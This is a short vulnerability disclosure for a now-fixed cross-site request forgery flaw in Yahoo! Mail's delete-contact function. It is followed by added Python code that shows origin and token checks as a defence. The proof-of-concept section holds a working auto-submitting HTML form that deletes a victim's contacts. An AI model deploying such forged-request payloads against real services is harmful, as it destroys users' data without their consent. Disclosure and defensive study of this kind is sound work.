Yahoo! Mail suffered from a cross-site request forgery (CSRF) vulnerability in its delete contact function. This has been fixed.
=======================================================================
YAHOOMAIL CSRF Vulnerability
=======================================================================
# Vulnerability found in: Yahoomail Delete Contact module
# Email: prakhar.agrawal26@gmail.com
# Company: AKS IT Services Pvt. Ltd
# Credit: Prakar Agrawal
# Email service: Yahoomail
# Category: Mail service
# Site page: http://www.yahoomail.com
# Platform: Java
# Proof of concept #
Targeted URL: http://address.mail.yahoo.com/
Script to delete contacts from the contact list through cross-site request forgery:
. ................................................................................................................
<html>
<body>
<form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/DeleteContact.json?" method="POST">
<input type=hidden name="action" value="delete_contacts">
<input type=hidden name="id" value="$Numeric No.$">
</form>
<script>document.csrf.submit();</script>
</body>
</html>
. ..................................................................................................................
Put any numeric value (e.g. 1, 2, 3, 4) in the id field parameter and try to forge the functionality. It's working.
# If you have any questions, comments, or concerns, feel free to contact me.
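The form above succeeds because the delete request is authorized by the session cookie alone, which the browser attaches to cross-site submissions. The following is an added example, not part of the original advisory and not Yahoo's actual fix (which the advisory does not describe): a server-side gate for such a state-changing POST that combines an Origin check with a session-bound token. The field name `csrf_token`, the origin `https://mail.example.test`, the key and the sample requests are all constructed assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)             # per-deployment secret (assumption)
TRUSTED_ORIGINS = {"https://mail.example.test"}  # placeholder for the app's own origin


def issue_token(session_id: str) -> str:
    """Token bound to the session; rendered into the genuine delete-contact form."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256)
    return f"{nonce}.{mac.hexdigest()}"


def token_ok(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, _, sig = token.partition(".")
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256)
    return hmac.compare_digest(mac.hexdigest().encode(), sig.encode())


def origin_ok(headers: dict) -> bool:
    """Strict policy: a missing, "null" or foreign Origin/Referer is rejected."""
    source = headers.get("Origin") or headers.get("Referer") or ""
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" in TRUSTED_ORIGINS


def allow_delete(session_id: str, headers: dict, form: dict) -> bool:
    """Gate for a state-changing POST such as action=delete_contacts."""
    return origin_ok(headers) and token_ok(session_id, form.get("csrf_token", ""))


# Constructed requests. The auto-submitted cross-site form rides on the victim's
# cookie (so the session resolves) but has a foreign Origin and no token.
SESSION = "sess-constructed-1"
forged = ({"Origin": "https://other-site.example"},
          {"action": "delete_contacts", "id": "1"})
genuine = ({"Origin": "https://mail.example.test"},
           {"action": "delete_contacts", "id": "1",
            "csrf_token": issue_token(SESSION)})

if __name__ == "__main__":
    print("forged allowed: ", allow_delete(SESSION, *forged))
    print("genuine allowed:", allow_delete(SESSION, *genuine))
```

Setting the session cookie with `SameSite=Lax` or `Strict` is a complementary browser-side control, since it stops the cookie from accompanying a cross-site form POST in the first place.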